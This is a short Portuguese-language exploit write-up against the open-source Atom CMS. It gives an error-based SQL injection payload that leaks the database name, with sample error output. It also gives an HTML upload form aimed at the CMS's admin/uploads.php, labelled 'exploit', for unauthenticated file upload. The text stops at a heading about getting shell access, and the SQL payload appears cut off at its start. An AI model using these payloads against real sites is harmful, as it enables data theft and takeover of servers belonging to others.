0x Atom CMS SQL Injection e file upload
Por ainda não ser uma cms com muita visibilidade na cena acho que ainda há poucos sites utilizando mas vamos lá atom é uma cms de código abeto se quiserem baixa la ela se encontra aqui
0x Exploração
SQL INJECTION
count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
O site lhe retornara o nome do banco de dados na ultima linha da pagina
FROM(select count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Duplicate entry 'acms1' for key 'group_key'
FILE UPLOAD
Mais uma vez iremos salvar um pequeno codigo como xpl.html e executaremos via browser
- <form action="http://127.0.0.1/atom_cms/admin/uploads.php"
- method="post"
- enctype="multipart/form-data">
- <label for="file">Filename:</label>
- <input type="file" name="file" id="file"><br>
- <input type="submit" name="submit" value="exploit">
- </form>
Obtendo acesso a shell